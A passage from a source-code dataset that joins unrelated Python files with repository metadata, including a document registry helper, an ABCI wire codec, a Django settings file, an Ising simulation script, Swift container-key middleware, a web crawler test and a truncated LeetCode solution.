    """Get a registered Document class by name."""
    doc = _document_registry.get(name, None)
    if not doc:
        # Possible old style name
        # Fall back to the unqualified class name: accept a registry key
        # that either ends with ".<name>" or equals <name> exactly.
        single_end = name.split('.')[-1]
        compound_end = '.%s' % single_end
        possible_match = [k for k in _document_registry
                          if k.endswith(compound_end) or k == single_end]
        # Resolve the fallback only when it is unambiguous (exactly one hit).
        if len(possible_match) == 1:
            doc = _document_registry.get(possible_match.pop(), None)
    if not doc:
        raise NotRegistered("""
            `%s` has not been registered in the document registry.
            Importing the document class automatically registers it, has it
            been imported?
        """.strip() % name)
    return doc
def _get_documents_by_db(connection_alias, default_connection_alias):
    """Return every registered Document class whose db_alias matches
    *connection_alias* (falling back to *default_connection_alias* when a
    class declares no db_alias of its own)."""
    matching = []
    for doc_cls in list(_document_registry.values()):
        doc_alias = doc_cls._meta.get('db_alias', default_connection_alias)
        if doc_alias == connection_alias:
            matching.append(doc_cls)
    return matching
|
[
"guozc@133.com"
] |
guozc@133.com
|
a8fd073471237610101d66b5b5288bd5c2f35af1
|
90419da201cd4948a27d3612f0b482c68026c96f
|
/sdk/python/pulumi_azure_nextgen/devtestlab/__init__.py
|
7c60ecc2f02f80c2494ffe58a8560274e9866950
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
test-wiz-sec/pulumi-azure-nextgen
|
cd4bee5d70cb0d332c04f16bb54e17d016d2adaf
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
refs/heads/master
| 2023-06-08T02:35:52.639773
| 2020-11-06T22:39:06
| 2020-11-06T22:39:06
| 312,993,761
| 0
| 0
|
Apache-2.0
| 2023-06-02T06:47:28
| 2020-11-15T09:04:00
| null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Make subpackages available:
from . import (
latest,
v20150521preview,
v20160515,
v20180915,
)
|
[
"public@paulstack.co.uk"
] |
public@paulstack.co.uk
|
b480f0d4a79df1e543ab8471ddd8b32a713f46a5
|
a61f73dd4cfd8d863e566f6b7422e1637967a1d7
|
/abci/example/python3/abci/wire.py
|
72f5fab8b0b227b6282599fe053b95fb0b57f555
|
[
"Apache-2.0"
] |
permissive
|
FirmaChain/tendermint
|
e1d91ee4c17f908c9f07d0771621201e9552e81f
|
aaa060fda4e3a564a32f1ba81f05cea93f6e34ce
|
refs/heads/master
| 2020-08-13T07:36:03.482612
| 2019-10-11T16:07:58
| 2019-10-11T16:07:58
| 214,933,104
| 14
| 0
|
Apache-2.0
| 2019-10-14T02:43:54
| 2019-10-14T02:43:53
| null |
UTF-8
|
Python
| false
| false
| 2,599
|
py
|
# the decoder works off a reader
# the encoder returns bytearray
def hex2bytes(h):
    """Convert a hex string (e.g. "ff00") to the corresponding bytearray.

    Fix: ``h.decode('hex')`` is a Python-2-only codec and raises on
    Python 3; ``bytearray.fromhex`` is the portable equivalent.
    """
    return bytearray.fromhex(h)
def bytes2hex(b):
    """Return the lowercase hex representation of a str or bytes-like value.

    For text input, each character's code point is rendered as (at least)
    two hex digits, matching the original str path.  Bytes/bytearray input
    is converted directly.

    Fixes: the original test was ``type(b) in (str, str)`` — a botched
    Python 2 ``(str, unicode)`` port — and the bytes path round-tripped
    through ``b.decode()``, which crashes on non-UTF-8 bytes like b"\\xff".
    """
    if isinstance(b, str):
        return "".join(hex(ord(c))[2:].zfill(2) for c in b)
    return "".join("{:02x}".format(byte) for byte in bytearray(b))
# expects uvarint64 (no crazy big nums!)
def uvarint_size(i):
    """Number of bytes (0..8) needed to hold the unsigned value *i*
    big-endian; zero maps to zero bytes."""
    if not i:
        return 0
    size = 1
    # Grow until the value fits in `size` bytes, capping at 8.
    while size < 8 and i >= (1 << (8 * size)):
        size += 1
    return size
# expects i < 2**size
def encode_big_endian(i, size):
    """Encode *i* as exactly *size* big-endian bytes (high bits beyond
    *size* bytes are silently dropped); size 0 yields an empty bytearray."""
    out = bytearray(size)
    # Fill from the least-significant end backwards.
    for pos in range(size - 1, -1, -1):
        out[pos] = i % 256
        i //= 256
    return out
def decode_big_endian(reader, size):
    """Read *size* bytes from *reader* (anything with .read) and interpret
    them as an unsigned big-endian integer."""
    value = 0
    for _ in range(size):
        value = value * 256 + reader.read(1)[0]
    return value
# ints are max 16 bytes long
def encode_varint(i):
    """Encode a signed int as [size byte][big-endian magnitude].

    Negative values add 0xF0 to the size byte; zero encodes as the single
    byte 0x00.
    """
    negate = i < 0
    magnitude = -i if negate else i
    size = uvarint_size(magnitude)
    if not size:
        return bytearray([0])
    prefix = size + 0xF0 if negate else size
    return bytearray([prefix]) + encode_big_endian(magnitude, size)
# returns the int and whats left of the byte array
def decode_varint(reader):
    """Inverse of encode_varint: read a size byte (values above 0xF0 mark a
    negative number), then that many big-endian magnitude bytes."""
    prefix = reader.read(1)[0]
    if not prefix:
        return 0
    negate = prefix > 0xF0
    size = prefix - 0xF0 if negate else prefix
    value = decode_big_endian(reader, size)
    return -value if negate else value
def encode_string(s):
    """Varint length prefix (character count) followed by the UTF-8 bytes."""
    payload = bytearray(s, 'utf8')
    return encode_varint(len(s)) + payload
def decode_string(reader):
    """Read a varint length, then that many bytes, decoded as UTF-8."""
    nbytes = decode_varint(reader)
    return reader.read(nbytes).decode()
def encode_list(s):
    """Concatenate the encodings of every element, prefixed with a varint
    element count."""
    body = bytearray()
    for item in s:
        body.extend(encode(item))
    return encode_varint(len(s)) + body
def encode(s):
    """Encode a supported value into the wire format.

    None -> empty; int -> varint; str -> length-prefixed UTF-8;
    list -> count-prefixed concatenation of encoded elements;
    bytearray -> length-prefixed raw bytes.

    Unsupported types print a diagnostic and implicitly return None
    (preserved from the original behavior).
    """
    print('encoding', repr(s))
    if s is None:
        return bytearray()
    if isinstance(s, int):
        return encode_varint(s)
    elif isinstance(s, str):
        return encode_string(s)
    elif isinstance(s, list):
        return encode_list(s)
    elif isinstance(s, bytearray):
        # Bug fix: the original delegated to encode_string, but
        # bytearray(s, 'utf8') raises TypeError when s is not a str.
        # Raw bytes only need the varint length prefix.
        return encode_varint(len(s)) + s
    else:
        print("UNSUPPORTED TYPE!", type(s), s)
if __name__ == '__main__':
    # Self-test: values must round-trip through encode/decode.
    # Fixes: the decoders take a reader object (with .read), not raw
    # bytearrays, so each buffer is wrapped in io.BytesIO; the decoded
    # results are scalars/strings, so they are printed directly (the old
    # `[i[0] for i in ds]` indexing assumed sequences and crashed).
    import io
    ns = [100, 100, 1000, 256]
    ss = [2, 5, 5, 2]
    bs = list(map(encode_big_endian, ns, ss))
    ds = [decode_big_endian(io.BytesIO(bytes(b)), size) for b, size in zip(bs, ss)]
    print(ns)
    print(ds)
    ss = ["abc", "hi there jim", "ok now what"]
    e = list(map(encode_string, ss))
    d = [decode_string(io.BytesIO(bytes(buf))) for buf in e]
    print(ss)
    print(d)
|
[
"tim@readevalprint.com"
] |
tim@readevalprint.com
|
ee818994979e4463590d325b2c982d6640272e36
|
7332aca74ee82c69a64737668f6aba4a20078b1b
|
/mysite/settings.py
|
dba505eed042889de7cf95363039bd098723daab
|
[] |
no_license
|
bcastillo1/my-first-blog
|
f1609730a2a69dca94c07b0ed017717ad8218d85
|
4b4f3cfa66f2aff51e8b33805d6dc0e0314afa55
|
refs/heads/master
| 2020-03-30T07:00:39.662973
| 2018-09-29T22:26:58
| 2018-09-29T22:26:58
| 150,907,876
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,181
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_x1u4*9l1=$7byhrg7yr&7%ozhw7+jne_avltk@9gb^qc8i2qv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [ '127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"you@example.com"
] |
you@example.com
|
6ecccd89ce3b40ed429583a7acf5dce755c3a3b2
|
6b265b404d74b09e1b1e3710e8ea872cd50f4263
|
/Python/Ising/ising_sim.py
|
480aca6617840c8fc9257de0549d3c56f609e818
|
[
"CC-BY-4.0"
] |
permissive
|
gjbex/training-material
|
cdc189469ae2c7d43784ecdcb4bcca10ecbc21ae
|
e748466a2af9f3388a8b0ed091aa061dbfc752d6
|
refs/heads/master
| 2023-08-17T11:02:27.322865
| 2023-04-27T14:42:55
| 2023-04-27T14:42:55
| 18,587,808
| 130
| 60
|
CC-BY-4.0
| 2023-08-03T07:07:25
| 2014-04-09T06:35:58
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,699
|
py
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
import importlib
import random
import sys
from runner import DomainSizeRunner
from averager import Averager
from util import print_options
arg_parser = ArgumentParser(description='2D ising system simulaation')
arg_parser.add_argument('--N', type=int, default=10,
help='system size, i.e., N x N')
arg_parser.add_argument('--J', type=float, default=1.0,
help='spin-spin interactino energy')
arg_parser.add_argument('--H', type=float, default=0.0,
help='magnetic field')
arg_parser.add_argument('--T', default='1.5',
help='temerature in units k_b, can be '
'a comma-separated list')
arg_parser.add_argument('--steps', type=int, default=1000,
help='number of simulation steps')
arg_parser.add_argument('--burn_in', type=int, default=100,
help='burn in for averages')
arg_parser.add_argument('--sample_period', type=int, default=10,
help='sample period for averages')
arg_parser.add_argument('--window', type=int, default=20,
help='window size for convergence test')
arg_parser.add_argument('--max_slope', type=float, default=1e-4,
help='maximum slope as convergence criterion')
arg_parser.add_argument('--runs', type=int, default=10,
help='number of independent runs')
arg_parser.add_argument('--file', default='result',
help='output file base name')
arg_parser.add_argument('--verbose', type=int, default=1,
help='show progress information, the '
'higher the value, the more detail')
arg_parser.add_argument('--seed', type=int,
help='seed for random number generator, '
'only needed for development')
arg_parser.add_argument('--python', action='store_true',
help='use pure Python implementation')
options = arg_parser.parse_args()
magn_file = open('{0}-magn.txt'.format(options.file), 'w')
domain_file = open('{0}-domains.txt'.format(options.file), 'w')
if options.seed is None:
seed = random.randint(0, 1000000000)
else:
seed = options.seed
if options.python:
ising_module = importlib.import_module('ising')
else:
ising_module = importlib.import_module('ising_cxx')
hdr_line_fmt = 'T {M:s} {E:s} {deltaE2:s}\n'
hdr_fmt = '{0:s} {0:s}_std {0:s}_min {0:s}_max'
val_line_fmt = '{T:.4f} {M:s} {E:s} {deltaE2:s}\n'
val_fmt = '{mean:.5e} {std:.5e} {min:.5e} {max:.5e}'
M_hdr = hdr_fmt.format('M')
E_hdr = hdr_fmt.format('E')
deltaE2_hdr = hdr_fmt.format('deltaE^2')
magn_file.write(hdr_line_fmt.format(M=M_hdr, E=E_hdr,
deltaE2=deltaE2_hdr))
print_options(magn_file, options)
domain_file.write('T domain_sizes\n')
print_options(domain_file, options)
for T in (float(T_str) for T_str in options.T.split(',')):
if options.verbose > 0:
sys.stderr.write('# computing T = {0:.4f}\n'.format(T))
ising = ising_module.IsingSystem(options.N, options.J, options.H, T)
ising.init_random(seed)
runner = DomainSizeRunner(ising=None, steps=options.steps,
is_verbose=options.verbose - 2,
burn_in=options.burn_in,
sample_period=options.sample_period,
window=options.window)
averager = Averager(runner, ising, is_verbose=options.verbose - 1)
averager.average(options.runs)
M_values = averager.get('M mean')
M_str = val_fmt.format(**M_values)
E_values = averager.get('E mean')
E_str = val_fmt.format(**E_values)
deltaE2_values = averager.get('deltaE^2')
deltaE2_str = val_fmt.format(**deltaE2_values)
magn_file.write(val_line_fmt.format(T=T, M=M_str, E=E_str,
deltaE2=deltaE2_str))
magn_file.flush()
domains = averager.get('domains')
distrubtion = ','.join(['{0:d}:{1:.8e}'.format(k, v)
for k, v in domains.items()])
domain_file.write('{0:.4f} {1:s}\n'.format(T, distrubtion))
domain_file.flush()
magn_file.close()
domain_file.close()
|
[
"geertjan.bex@uhasselt.be"
] |
geertjan.bex@uhasselt.be
|
daf6ce6d701a3f7fd5d4d5556db1235f1aea559b
|
2d227925231be797cc78b644358ecd3adf00fba7
|
/ce/c240.py
|
802087ab037d7ba1d123f6f276c8a9eb0c788b26
|
[] |
no_license
|
egalli64/pythonesque
|
6bb107189d4556d832175d41366ea0b18ed6ea1d
|
154042c5ae5cf43a0ae2c03d509fc48d1dc19eb8
|
refs/heads/master
| 2023-07-07T05:50:14.711023
| 2023-07-01T10:52:24
| 2023-07-01T10:52:24
| 53,720,525
| 21
| 7
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
"""
Mersenne prime
author: Manny egalli64@gmail.com
info: http://thisthread.blogspot.com/2017/02/codeeval-mersenne-prime.html
https://www.codeeval.com/open_challenges/240/
"""
import sys
from math import sqrt
marsennes = [(2, 3)]
def is_prime(number):
    """Trial-division primality test.

    Numbers below 2 are reported prime (empty divisor range), matching the
    original; callers only pass exponents >= 2.
    """
    limit = int(sqrt(number))
    return all(number % d for d in range(2, limit + 1))
def trim(value):
    """Prefix of the global ``marsennes`` cache whose Mersenne numbers are
    strictly below *value*.

    Callers guarantee value <= marsennes[-1][1], so the scan terminates.
    """
    cutoff = 0
    while marsennes[cutoff][1] < value:
        cutoff += 1
    return marsennes[:cutoff]
def get_marsennes(value):
    """Return the cached (exponent, mersenne) pairs with mersenne <= value,
    extending the module-level ``marsennes`` cache as needed.
    """
    if value <= marsennes[-1][1]:
        # Everything requested is already cached: slice the prefix.
        return trim(value)
    index = marsennes[-1][0]
    while True:
        index += 1
        # Only prime exponents are considered (2**p - 1 with composite p
        # is never prime).
        # NOTE(review): the resulting 2**p - 1 itself is NOT primality
        # tested, so e.g. 2**11 - 1 = 2047 = 23*89 is cached too — confirm
        # the challenge wants Mersenne numbers rather than Mersenne primes.
        if not is_prime(index):
            continue
        marsenne = 2**index - 1
        marsennes.append((index, marsenne))
        if marsenne < value:
            continue
        # Reached or passed the bound: drop the last pair unless it equals
        # *value* exactly.
        return marsennes if marsenne == value else marsennes[:-1]
def solution(line):
    """Format the comma-separated Mersenne numbers up to the bound given
    as a decimal string on *line*."""
    bound = int(line)
    return ', '.join(str(mersenne) for _, mersenne in get_marsennes(bound))
if __name__ == '__main__':
    # CLI entry: one test case per line of the file named in argv[1].
    if len(sys.argv) == 2:
        # 'with' guarantees the file is closed even if solution() raises,
        # unlike the original explicit close() after the loop.
        with open(sys.argv[1], 'r') as test_cases:
            for test in test_cases:
                print(solution(test.rstrip('\n')))
    else:
        print('Data filename expected as argument!')
|
[
"egalli64@gmail.com"
] |
egalli64@gmail.com
|
efc014f939c2d949b0cd19569ef658a32e5e1fe1
|
cb530e68e4151f793b42b84a86e75794e71efbc0
|
/containerkeys/middleware.py
|
993be599e94d17cbe850e168e41066d55a3807c3
|
[
"Apache-2.0"
] |
permissive
|
CloudBrewery/swift-container-keys
|
7614ffdf313a8cb90b128be08a4845a438705312
|
c6406dbc45858c13bd5cc7935dc81a9129141529
|
refs/heads/master
| 2021-01-15T11:12:04.166532
| 2015-01-09T17:41:14
| 2015-01-09T17:41:14
| 29,027,338
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,099
|
py
|
# Copyright (c) 2015 Cloud Brewery Inc. (cloudbrewery.io)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Container Keys Middleware
Allows for access to containers based on a simple key rather than requiring
a user to supply Keystone credentials, and embed them in their application.
Container keys supports two keys, specifically X-Container-Meta-Full-Key and
X-Container-Meta-Read-Key. Whichever is supplied will be authenticated against.
Read-Key will only accept GET requests, not POST/PUT/DELETE, which would be
supported by Full-Key.
Multiple keys can be set per container, of the following format:
X-Container-Meta-[Full|Read](-[1-9])?
The maximum number of keys that are checked is configurable, and can be used
to implement multiple valid keys per container, or a key recycling policy.
"""
from collections import defaultdict
from swift.common import utils as swift_utils
from swift.common.swob import HTTPUnauthorized
from swift.proxy.controllers.base import get_container_info
FULL_KEY = 'Full-Key'
READ_KEY = 'Read-Key'
FULL_KEY_HEADER = 'HTTP_X_CONTAINER_META_FULL_KEY'
READ_KEY_HAEDER = 'HTTP_X_CONTAINER_META_READ_KEY'
READ_RESTRICTED_METHODS = ['PUT', 'POST', 'DELETE']
DEFAULT_MAX_KEYS_PER_CONTAINER = 3
def generate_valid_metadata_keynames(key_name, max_keys):
    """
    Build the list of metadata key names that may hold container keys.

    The first slot is the bare lower-cased name; additional slots carry a
    numeric suffix starting at 2 (e.g. ``full-key``, ``full-key-2``, ...).

    :param key_name: base key (unprefixed)
    :param max_keys: max number of valid keys
    :returns: list of names of keys that are valid.
    """
    base = key_name.lower()
    names = [base]
    for suffix in range(2, max_keys + 1):
        names.append("%s-%s" % (base, suffix))
    return names
def get_container_keys_from_metadata(meta, max_keys):
    """
    Collect the container-key values stored in container metadata.

    :param meta: container metadata dict
    :param max_keys: max number of valid keys to check on a container
    :returns: defaultdict mapping key type (FULL_KEY / READ_KEY) to the
        list of key values found (possibly empty if no keys are set)
    """
    found = defaultdict(list)
    full_names = generate_valid_metadata_keynames(FULL_KEY, max_keys)
    read_names = generate_valid_metadata_keynames(READ_KEY, max_keys)
    for name, raw_value in meta.iteritems():
        # normalize the value first, exactly as for matched keys
        value = swift_utils.get_valid_utf8_str(raw_value)
        lowered = name.lower()
        if lowered in full_names:
            found[FULL_KEY].append(value)
        elif lowered in read_names:
            found[READ_KEY].append(value)
    return found
def key_matches(to_match, keys):
    """
    Check whether ``to_match`` equals any key in ``keys``.

    Each comparison uses swift's streq_const_time to guard against timing
    attacks; every key is compared (no short-circuit) so the number of
    comparisons performed does not depend on which key matched.

    :param to_match: a key to check contains
    :param keys: a list of keys to compare against
    :returns: boolean
    """
    results = [swift_utils.streq_const_time(to_match, candidate)
               for candidate in keys]
    return True in results
def extract_request_keys(env):
    """
    Find which container key (if any) the request supplied.

    The Full key header takes precedence over the Read key header when
    both are present.

    :param env: The WSGI environment for the request.
    :returns: (key type, key value), or (None, None) when neither header
        was sent
    """
    for key_type, header_name in ((FULL_KEY, FULL_KEY_HEADER),
                                  (READ_KEY, READ_KEY_HAEDER)):
        if header_name in env:
            return key_type, env.get(header_name)
    return None, None
class ContainerKeys(object):
    """
    WSGI Middleware to grant access to containers based on pre-defined
    Read / Full access API keys on a per-container basis. See the overview
    for more information.

    :param app: The next WSGI filter or app in the paste.deploy chain.
    :param conf: The configuration dict for the middleware.
    :param max_keys_per_container: maximum number of key slots checked per
        container (see generate_valid_metadata_keynames).
    """

    def __init__(self, app, conf,
                 max_keys_per_container=DEFAULT_MAX_KEYS_PER_CONTAINER):
        self.app = app
        self.conf = conf
        self.max_keys_per_container = max_keys_per_container
        self.logger = swift_utils.get_logger(conf, log_route='containerkeys')

    def __call__(self, env, start_response):
        """
        Main hook into the WSGI paste.deploy filter/app pipeline.

        :param env: The WSGI environment dict.
        :param start_response: The WSGI start_response hook.
        :returns: Response as per WSGI.
        """
        # Start by passing through based on the least amount of processing
        # possible to regular auth.
        if env.get('HTTP_X_AUTH_TOKEN', False):
            # user is trying standard auth, continue the request per usual.
            return self.app(env, start_response)

        try_key_type, try_key_value = extract_request_keys(env)
        if not try_key_value or not try_key_type:
            # if no headers were attempted, pass through to keystone
            # empty api key header is a no-op
            return self.app(env, start_response)

        keys = self._get_container_keys(env)
        if not keys:
            # if no keys are set on a container, pass through to keystone
            return self.app(env, start_response)

        #
        # Begin marking requests as invalid, a user actually want to try now.
        #
        # NOTE: `keys` is a defaultdict, but dict.get() does NOT invoke the
        # default factory, so an explicit [] default is required -- a
        # container that has only one key type set would otherwise hand
        # None to key_matches() and crash with a TypeError.
        if try_key_type == READ_KEY:
            if not key_matches(try_key_value, keys.get(READ_KEY, [])):
                # invalid key
                return self._invalid(env, start_response)
            if env['REQUEST_METHOD'] in READ_RESTRICTED_METHODS:
                # read keys cannot do non-read actions
                return self._invalid(env, start_response)
        elif (try_key_type == FULL_KEY
                and not key_matches(try_key_value, keys.get(FULL_KEY, []))):
            # invalid full key
            return self._invalid(env, start_response)

        #
        # Thundercats are GO. Tell us not to continue authorization down the
        # stream.
        #
        env['swift.authorize_override'] = True
        return self.app(env, start_response)

    def _get_container_keys(self, env):
        """
        Returns the X-Container-Meta-[Full|Read]-Key-[N]? header values for the
        container, or an empty dict if none are set.

        (The previous unused ``account`` parameter -- which the call site
        was mistakenly filling with the WSGI start_response callable -- has
        been removed; it was never read.)

        :param env: The WSGI environment for the request.
        :returns: {key_type: [key_value, ...]}
        """
        container_info = get_container_info(env, self.app, swift_source='CK')
        return get_container_keys_from_metadata(container_info['meta'],
                                                self.max_keys_per_container)

    def _invalid(self, env, start_response):
        """
        Performs the necessary steps to indicate a WSGI 401
        Unauthorized response to the request.

        :param env: The WSGI environment for the request.
        :param start_response: The WSGI start_response hook.
        :returns: 401 response as per WSGI.
        """
        if env['REQUEST_METHOD'] == 'HEAD':
            # HEAD responses must not carry a body
            body = None
        else:
            body = '401 Unauthorized: Auth Key invalid\n'
        return HTTPUnauthorized(body=body)(env, start_response)
def filter_factory(global_conf, **local_conf):
    """Paste.deploy entry point: build the containerkeys WSGI filter."""
    conf = global_conf.copy()
    conf.update(local_conf)

    max_keys = int(conf.get('max_keys_per_container',
                            DEFAULT_MAX_KEYS_PER_CONTAINER))
    swift_utils.register_swift_info(
        'containerkeys',
        max_keys_per_container=max_keys)

    def make_filter(app):
        return ContainerKeys(app, conf, max_keys_per_container=max_keys)
    return make_filter
|
[
"thurloat@gmail.com"
] |
thurloat@gmail.com
|
7af4bd620c1eacbd1e6a1703e168ef6bebae1672
|
4875108ee320efe3e17346e35359f938af7146b1
|
/test.py
|
63c6f35d1d049bbe0fb91c7e5c802960d0956c47
|
[
"BSD-2-Clause"
] |
permissive
|
liuqingci/PSpider
|
504db41f69e61beaf22face04defe39a38a20843
|
45fffd5395027cb930898b9b728ba6f3d36bc034
|
refs/heads/master
| 2020-06-02T23:18:08.101128
| 2019-06-11T02:54:22
| 2019-06-11T06:13:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,083
|
py
|
# _*_ coding: utf-8 _*_
"""
test.py by xianhu
"""
import re
import sys
import spider
import random
import logging
import datetime
import requests
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings()
class MyFetcher(spider.Fetcher):
    """
    Fetcher module: downloads a url with requests and hands back
    (status_code, final_url, body_text).
    """

    def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None):
        resp = requests.get(url, params=None, headers={}, data=None,
                            proxies=proxies, verify=False,
                            allow_redirects=True, timeout=(3.05, 10))
        resp.raise_for_status()
        # deliberately fail ~1% of the time to exercise error logging
        assert random.randint(0, 100) != 8, "error-in-fetcher"
        return 1, (resp.status_code, resp.url, resp.text), 1
class MyParser(spider.Parser):
    """
    Parser module: pulls follow-up links and the page title out of a page.
    """

    def __init__(self, max_deep=0):
        """
        :param max_deep: crawl depth limit; negative means unlimited
        """
        self._max_deep = max_deep

    def htm_parse(self, priority: int, url: str, keys: dict, deep: int, content: object):
        _status_code, _url_now, html_text = content

        # simulate heavy parsing work (exercises multi-processing)
        for _ in range(10):
            BeautifulSoup(html_text, "lxml")

        url_list = []
        if self._max_deep < 0 or deep < self._max_deep:
            for href in re.findall(r"<a.+?href=\"(?P<url>.{5,}?)\".*?>", html_text, flags=re.IGNORECASE):
                url_list.append((spider.get_url_legal(href, base_url=url), keys, priority + 1))

        # save_list can be list / tuple / dict
        title = re.search(r"<title>(?P<title>.+?)</title>", html_text, flags=re.IGNORECASE)
        if title:
            save_list = [{"url": url, "title": title.group("title").strip(), "datetime": datetime.datetime.now()}]
        else:
            save_list = {}

        # deliberately fail ~1% of the time to exercise error logging
        assert random.randint(0, 100) != 8, "error-in-parser"
        return 1, url_list, save_list
class MySaver(spider.Saver):
    """
    Saver module: writes one tab-separated line per parsed item to a pipe.
    """

    def __init__(self, save_pipe=sys.stdout):
        """
        :param save_pipe: writable file-like object receiving the output
        """
        self._save_pipe = save_pipe

    def item_save(self, url: str, keys: dict, item: (list, tuple, dict)):
        # item is expected to be the dict produced by MyParser
        line = "\t".join([item["url"], item["title"], str(item["datetime"])])
        self._save_pipe.write(line + "\n")
        self._save_pipe.flush()
        return 1, None
class MyProxies(spider.Proxieser):
    """
    Proxies module: fetches a newline-separated ip:port list and converts
    it to requests-style proxy dicts.
    """

    def proxies_get(self):
        response = requests.get("http://xxxx.com/proxies")
        result = []
        for ipport in response.text.split("\n"):
            result.append({"http": "http://%s" % ipport,
                           "https": "https://%s" % ipport})
        return 1, result
def test_spider():
    """
    Wire up fetcher/parser/saver/proxieser and crawl appinn.com.

    Runs the spider with 20 fetcher threads, depth limit 2, and blocks
    until the crawl finishes. Output rows go to ./out.txt.
    """
    # initial fetcher / parser / saver / proxieser
    fetcher = MyFetcher(sleep_time=0, max_repeat=3)
    parser = MyParser(max_deep=2)
    # NOTE(review): out.txt is opened here but never explicitly closed
    saver = MySaver(save_pipe=open("out.txt", "w"))
    proxieser = MyProxies(sleep_time=5)

    # define url_filter: only follow urls matching the whitelist pattern
    url_filter = spider.UrlFilter(white_patterns=(re.compile(r"^http[s]?://(www\.)?appinn\.com"), ), capacity=None)

    # initial web_spider (commented variant runs without a proxies source)
    # web_spider = spider.WebSpider(fetcher, parser, saver, proxieser=None, url_filter=url_filter, queue_parse_size=-1)
    web_spider = spider.WebSpider(fetcher, parser, saver, proxieser=proxieser, url_filter=url_filter, queue_parse_size=100, queue_proxies_size=100)

    # add start url
    web_spider.set_start_url("https://www.appinn.com/", priority=0, keys={"type": "index"}, deep=0)

    # start web_spider
    web_spider.start_working(fetcher_num=20)

    # wait for finished
    web_spider.wait_for_finished()
    return
if __name__ == "__main__":
    # only warnings and above, tab-separated with timestamps
    logging.basicConfig(level=logging.WARNING, format="%(asctime)s\t%(levelname)s\t%(message)s")
    test_spider()
    exit()
|
[
"qixianhu@qq.com"
] |
qixianhu@qq.com
|
a3bb06d33689b7e7c1437a306a443d4701cb84c1
|
f2889a13368b59d8b82f7def1a31a6277b6518b7
|
/2007.py
|
21c2d0bc31844393f9fde2d7322b2be12978ac4f
|
[] |
no_license
|
htl1126/leetcode
|
dacde03de5c9c967e527c4c3b29a4547154e11b3
|
c33559dc5e0bf6879bb3462ab65a9446a66d19f6
|
refs/heads/master
| 2023-09-01T14:57:57.302544
| 2023-08-25T15:50:56
| 2023-08-25T15:50:56
| 29,514,867
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
# Ref: https://leetcode.com/problems/find-original-array-from-doubled-array/discuss/1470959/JavaC%2B%2BPython-Match-from-the-Smallest-or-Biggest-100
class Solution:
    def findOriginalArray(self, changed: List[int]) -> List[int]:
        """
        Recover one valid "original" array from an array formed by
        appending the doubles of the original and shuffling; return []
        when no such original exists.

        Greedy: walk values in ascending order and pair each remaining
        count against its double.
        """
        counts = collections.Counter(changed)
        # zeros pair with themselves, so an odd count can never be matched
        if counts[0] % 2 == 1:
            return []
        for value in sorted(counts):  # keys must be visited smallest-first
            if counts[value] > counts[value * 2]:
